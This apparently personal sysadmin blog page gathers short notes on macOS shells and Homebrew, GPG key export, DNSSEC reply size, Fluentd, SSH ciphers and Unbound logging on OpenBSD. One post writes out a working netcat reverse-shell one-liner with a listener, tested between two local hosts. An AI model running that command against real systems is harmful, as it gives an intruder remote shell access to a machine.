Blog

sha256: 2b87a252a3d912530dd8c20df6bee7f6cbc4ede0074fdf217e318aab39d9736c

macOS

Categories

some adaption for macOS

CUPS

enable cups

cupsctl WebInterface=yes
  • http://localhost:631/printers/

Shell

macOS is using zsh since while. If you wanna switch back to bash, here some Notes …"

Switch to Bash

chsh -s /bin/bash

Switch to Zsh

chsh -s /bin/zsh

install brew

the famous package manager for macOS

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

install keychain

if you work with ssh agent, you may wanna try keychain …

brew install keychain

build .bash_profile

this will overwrite your existing .bash_profile

GPG & Gopass & Gitlab

OpenBSD

GPG and how to use it

Create a Key with ECC

gpg --expert --full-generate-key
  • (9) ECC and ECC
  • (1) Curve 25519
  • 0 = key does not expire (or whatever you prefer!)
  • Real name: Max Muster
  • Email address: max@muster.net
  • Comment: -
pub   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid                      Max Muster (-) <max@muster.net>
sub   cv25519 2022-09-04 [E]

Public Key

max@host $ gpg
/home/max/.gnupg/pubring.kbx
----------------------------
pub   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid           [ultimate] Max Muster (-) <max@muster.net>
sub   cv25519 2022-09-04 [E]

Private Key

max@host $ gpg -K
/home/max/.gnupg/pubring.kbx
----------------------------
sec   ed25519 2022-09-04 [SC]
      256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid           [ultimate] Max Muster (-) <max@muster.net>
ssb   cv25519 2022-09-04 [E]

Export All Keys

ASCII Format

gpg --export --armor > public.key.asc
gpg --export-secret-key --armor > private.key.asc

GPG Format

gpg --output public.gpg --export
gpg --output private.gpg --export-secret-key

Export one Key only

Set Key

keyID=256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E

ASCII Format

gpg --export --armor > $keyID.pub.key.asc $keyID
gpg --export-secret-key --armor > $keyID.key.asc $keyID

GPG Format

gpg --output $keyID.pub.gpg --export $keyID
gpg --output $keyID.gpg --export-secret-key $keyID

Export to QRCode

gpg --export --armor |qrencode -t UTF8
gpg --export-secret-keys --armor |qrencode -t UTF8

Export QRCode to PNG

qrencode -r $keyID.pub.key.asc -o $keyID.pub.png
qrencode -r $keyID.key.asc -o $keyID.png

Delete private Key without asking!

gpg --yes --batch --delete-secret-key $keyID

Delete both Keys without asking!

gpg --yes --batch --delete-secret-and-public-key $keyID

Key Management

List Keys

max@host $ file *key*
private.key:     data
private.key.asc: ASCII text
public.key:      data
public.key.asc:  PGP public key block

Delete Key

keyID=
gpg --delete-secret-key $keyID
gpg --delete-key $keyID

or delete both without asking!

OpenBSD - ReverseShell

Security, OpenBSD

Reverse Shells

Test it

Listen on Host A

Set Lister on Host A (192.168.1.100)

hostA # nc -l 4242

Start Reverse Shell on Host B

hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f

here we are

hostA # hostname
hostA.somewhere
hostA # nc -l 4242
hostB # hostname
hostB.somewhere

nice ;)

Any Comments ?

sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

DNSSEC - OARC Size Tester

DNS, Security

Talk from @mwl at BSDCAN 2022

https://www.youtube.com/watch?v=1n62VZj-CKI

OARC Reply Size Tester

dig +short rs.dns-oarc.net TXT

Host1 - good :)

# dig +short rs.dns-oarc.net TXT
rst.x4090.rs.dns-oarc.net.
rst.x4058.x4090.rs.dns-oarc.net.
rst.x4064.x4058.x4090.rs.dns-oarc.net.
"45.15.80.80 DNS reply size limit is at least 4090"
"45.15.80.80 sent EDNS buffer size 4096"

Host2 - bad :(

# dig +short rs.dns-oarc.net TXT
rst.x1196.rs.dns-oarc.net.
rst.x1206.x1196.rs.dns-oarc.net.
rst.x1204.x1206.x1196.rs.dns-oarc.net.
"74.63.25.240 DNS reply size limit is at least 1206"
"74.63.25.240 sent EDNS buffer size 1232"
Any Comments ?

sha256: 110b220f93eff767b7e4d488294b00ede4f4509258d0148704b145df79fa9821

Fluent - Data Collector

Monitoring

Fluentd is an open-source data collector for a unified logging layer. Fluentd allows you to unify data collection and consumption for better use and understanding of data.

Docu

Install Ruby

pkg_add ruby-3.1.2

ln -sf /usr/local/bin/ruby31 /usr/local/bin/ruby
ln -sf /usr/local/bin/bundle31 /usr/local/bin/bundle
ln -sf /usr/local/bin/bundler31 /usr/local/bin/bundler
ln -sf /usr/local/bin/erb31 /usr/local/bin/erb
ln -sf /usr/local/bin/gem31 /usr/local/bin/gem
ln -sf /usr/local/bin/irb31 /usr/local/bin/irb
ln -sf /usr/local/bin/rdoc31 /usr/local/bin/racc
ln -sf /usr/local/bin/rake31 /usr/local/bin/rake
ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rbs
ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdbg
ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdoc
ln -sf /usr/local/bin/ri31 /usr/local/bin/ri
ln -sf /usr/local/bin/typeprof31 /usr/local/bin/typeprof

Install Fluentd

gem install fluentd

ln -sf /usr/local/bin/fluentd31 /usr/local/bin/fluentd

Create Config

fluentd --setup /etc/fluent

Edit config

cat << 'EOF ' > /etc/fluent/fluent.conf
# fluent.conf

# Nginx Log
<source>
  @type tail
  format nginx
  path /var/log/nginx/blog.stoege.net.log
  pos_file /var/log/nginx-pos/blog.stoege.net.log
  time_key fluentd_time
  time_format %d/%b/%Y:%H:%M:%S %z
  tag nginx.access
</source>

# Output
<match nginx.access>
  @type file
  path /var/log/fluent/blog.stoege.net
</match>
EOF

Run

fluentd -c /etc/fluent/fluent.conf

Sample Data

tail -f /var/log/fluent/blog.stoege.net/buffer.b5e6e8e8ee14db5e3a401bb38f14a6de5.log
2022-08-23T15:54:58+02:00	nginx.access	{"remote":"114.119.135.215","host":"-","user":"-","time":"23/Aug/2022:15:54:58 +0200","method":"GET","path":"/tags/monitoring/","code":"200","size":"33684","referer":"https://blog.stoege.net/tags/vpn","agent":"Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)","http_x_forwarded_for":"-"}
2022-08-23T15:55:42+02:00	nginx.access	{"remote":"147.182.168.107","host":"-","user":"-","time":"23/Aug/2022:15:55:41 +0200","method":"GET","path":"/index.xml","code":"304","size":"0","referer":"-","agent":"NewsBlur Feed Fetcher - 2 subscribers - https://www.newsblur.com/site/8313934/blog-stoege-net (\\x22Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15\\x22)","http_x_forwarded_for":"-"}
2022-08-23T15:55:42+02:00	nginx.access	{"remote":"147.182.168.107","host":"-","user":"-","time":"23/Aug/2022:15:55:42 +0200","method":"GET","path":"/","code":"200","size":"56891","referer":"-","agent":"NewsBlur Page Fetcher - 2 subscribers - https://www.newsblur.com/site/8313934/blog-stoege-net (\\x22Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15\\x22)","http_x_forwarded_for":"-"}
Any Comments ?

sha256: fb02e126f5e34e4be8630c5190e9af68d2c36e91e5c4d54a11f6b70a3be6563b

Sensorsd - UPS Shutdown

OpenBSD

Shutdown Hosts on Power Outages

Everybody is talking about Power Outages. Let’s assume you have a Smart-UPS for your Playground and you’d like to shut some Infrastructure to avoid some troubles with corrupt filesystems, broken vm’s and things like that.

Connection UPS to APU via USB Cable

dmesg show the UPS connected

APU# dmesg
uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ...
uhidev0: iclass 3/0, 142 report ids
upd0 at uhidev0
uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1
uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1
...
uhid21 at uhidev0 reportid 142: input=0, output=0, feature=4

Check sysctl

what kind of information do we get from the hardware sensor ?

SSH - Cipher, Key, MAC

OpenBSD

SSH Stuff

Supported Ciphers, Key, MAC on OpenBSD 7.1. Not all of them are good for useage, here is my recommendation.

for your sshd_config / ssh_config

Ciphers                aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes128-cbc

HostKeyAlgorithms      ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,
                       sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-256

Kexalgorithms          curve25519-sha256@libssh.org,diffie-hellman-group16-sha512,
                       diffie-hellman-group18-sha512,diffie-hellman-group14-sha256

MACs                   hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com

PubKeyAcceptedKeyTypes ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,
                       rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,
                       ssh-rsa-cert-v01@openssh.com,sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-25

List of all available Types

Cipher

ssh -Q cipher

3des-cbc
aes128-cbc
aes192-cbc
aes256-cbc
aes128-ctr
aes192-ctr
aes256-ctr
aes128-gcm@openssh.com
aes256-gcm@openssh.com
chacha20-poly1305@openssh.com

HostbasedAcceptedAlgorithms

ssh -Q HostbasedAcceptedAlgorithms

ssh-ed25519
ssh-ed25519-cert-v01@openssh.com
sk-ssh-ed25519@openssh.com
sk-ssh-ed25519-cert-v01@openssh.com
ssh-rsa
rsa-sha2-256
rsa-sha2-512
ssh-dss
ecdsa-sha2-nistp256
ecdsa-sha2-nistp384
ecdsa-sha2-nistp521
sk-ecdsa-sha2-nistp256@openssh.com
webauthn-sk-ecdsa-sha2-nistp256@openssh.com
ssh-rsa-cert-v01@openssh.com
rsa-sha2-256-cert-v01@openssh.com
rsa-sha2-512-cert-v01@openssh.com
ssh-dss-cert-v01@openssh.com
ecdsa-sha2-nistp256-cert-v01@openssh.com
ecdsa-sha2-nistp384-cert-v01@openssh.com
ecdsa-sha2-nistp521-cert-v01@openssh.com
sk-ecdsa-sha2-nistp256-cert-v01@openssh.com

HostKeyAlgorithms

ssh -Q HostKeyAlgorithms

ssh-ed25519
ssh-ed25519-cert-v01@openssh.com
sk-ssh-ed25519@openssh.com
sk-ssh-ed25519-cert-v01@openssh.com
ssh-rsa
rsa-sha2-256
rsa-sha2-512
ssh-dss
ecdsa-sha2-nistp256
ecdsa-sha2-nistp384
ecdsa-sha2-nistp521
sk-ecdsa-sha2-nistp256@openssh.com
webauthn-sk-ecdsa-sha2-nistp256@openssh.com
ssh-rsa-cert-v01@openssh.com
rsa-sha2-256-cert-v01@openssh.com
rsa-sha2-512-cert-v01@openssh.com
ssh-dss-cert-v01@openssh.com
ecdsa-sha2-nistp256-cert-v01@openssh.com
ecdsa-sha2-nistp384-cert-v01@openssh.com
ecdsa-sha2-nistp521-cert-v01@openssh.com

KexAlgorithms

ssh -Q KexAlgorithms

diffie-hellman-group1-sha1
diffie-hellman-group14-sha1
diffie-hellman-group14-sha256
diffie-hellman-group16-sha512
diffie-hellman-group18-sha512
diffie-hellman-group-exchange-sha1
diffie-hellman-group-exchange-sha256
ecdh-sha2-nistp256
ecdh-sha2-nistp384
ecdh-sha2-nistp521
curve25519-sha256
curve25519-sha256@libssh.org
sntrup761x25519-sha512@openssh.com
diffie-hellman-group1-sha1
diffie-hellman-group14-sha1
diffie-hellman-group14-sha256
diffie-hellman-group16-sha512
diffie-hellman-group18-sha512
diffie-hellman-group-exchange-sha1
diffie-hellman-group-exchange-sha256
ecdh-sha2-nistp256
ecdh-sha2-nistp384
ecdh-sha2-nistp521
curve25519-sha256
curve25519-sha256@libssh.org
sntrup761x25519-sha512@openssh.com

MAC

Message Authentication Code

OpenBSD - Full Disk Encryption

OpenBSD, Security

Intro

I never used the Fulldisk Encryption Feature as there was no need for. It doesn’t make sense for Hosted VM’s, as you have to enter the Passphrase at every boot at the Console. So, it’s a pain and still possible to intercept on the Hosters Infrastructure. Disk Encryption does not make sense at home, as all my Devices remains at home (and hopefully never got stolen). It would make sense on a Notebook, but i’m more the Apple Fanboy when it comes to portable Machines. And there, we have FileVault which basically does the same. However, i’d like to give a try with a Test VM. There are plenty of instructions how to setup up, i just tried one and made some notes as usual.

JC - JSON from CLI

OpenBSD

how to build json from cli

we all like json, do we ? https://kellyjonbrazil.github.io/jc/docs/parsers/ping

add package

doas pkg_add jc

try ping

openbsd-box # ping -c 3 1.1.1.1 |jc --ping -p 2>/dev/null
{
  "destination_ip": "1.1.1.1",
  "data_bytes": 56,
  "pattern": null,
  "destination": "1.1.1.1",
  "packets_transmitted": 3,
  "packets_received": 3,
  "packet_loss_percent": 0.0,
  "duplicates": 0,
  "round_trip_ms_min": 9.219,
  "round_trip_ms_avg": 9.826,
  "round_trip_ms_max": 10.158,
  "round_trip_ms_stddev": 0.43,
  "responses": [
    {
      "type": "reply",
      "bytes": 64,
      "response_ip": "1.1.1.1",
      "icmp_seq": 0,
      "ttl": 59,
      "time_ms": 10.158,
      "duplicate": false
    },
    {
      "type": "reply",
      "bytes": 64,
      "response_ip": "1.1.1.1",
      "icmp_seq": 1,
      "ttl": 59,
      "time_ms": 9.219,
      "duplicate": false
    },
    {
      "type": "reply",
      "bytes": 64,
      "response_ip": "1.1.1.1",
      "icmp_seq": 2,
      "ttl": 59,
      "time_ms": 10.101,
      "duplicate": false
    }
  ]
}

Compatible platforms: linux, darwin, freebsd -> had to redirect the stderr to /dev/null because OpenBSD is not (yet) supported officially…

Unbound - Logging

OpenBSD

Enable Logging for Unbound

update unbound.conf

/var/unbound/etc/unbound.conf

server:
    logfile: /log/unbound.log
    verbosity: 1
    log-queries: yes
...

create folder/logfile

log=/var/unbound/log/unbound.log
doas mkdir /var/unbound/log/
touch $log
chmod 660 $log
chown _unbound:_unbound $log

restart service

doas rcctl restart unbound

tail logfile

tail -f /var/unbound/log/unbound.log

# tail -f /var/unbound/log/unbound.log
[1660208341] unbound[3279:0] notice: init module 0: validator
[1660208341] unbound[3279:0] notice: init module 1: iterator
[1660208341] unbound[3279:0] info: start of service (unbound 1.15.0).
[1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.euro.apple.com. A IN
[1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.euro.apple.com. AAAA IN
Any Comments ?

sha256: 2a8843dffec0d8bbd8ff1b2ab4748600dfc57ba00bd87707e1f505c849b89fa3